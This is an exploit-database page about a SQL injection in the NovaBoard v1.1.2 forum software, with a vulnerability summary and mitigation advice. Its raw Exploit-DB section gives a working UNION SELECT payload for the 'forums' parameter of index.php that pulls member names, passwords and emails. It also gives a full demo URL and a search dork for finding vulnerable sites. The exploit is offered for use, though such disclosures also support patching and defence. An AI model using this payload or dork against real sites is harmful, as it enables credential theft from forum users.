header-logo
Suggest Exploit
vendor:
NovaBoard
by:
Delibey
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: NovaBoard
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

NovaBoard v1.1.2 SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in NovaBoard v1.1.2 to gain access to sensitive information such as usernames, passwords, and emails. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'page' and 'forums' parameters of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, input validation should be performed on all user-supplied input. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

############################################################# 
# NovaBoard v1.1.2 SQL Injection Vulnerability 
  
# Plugin Home: http://www.novaboard.net/ 
  
# Author: Delibey 
  
# Site: www.1923turk.com 
 
############################################################## 
  
  
# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
                                    
  
   
# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj] 
  
  
#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
             
#  Dork  : "Powered by NovaBoard v1.1.2"           
  
# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
  
   
############################################################## 
# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Navigation

Suggest Exploit

Services By CQR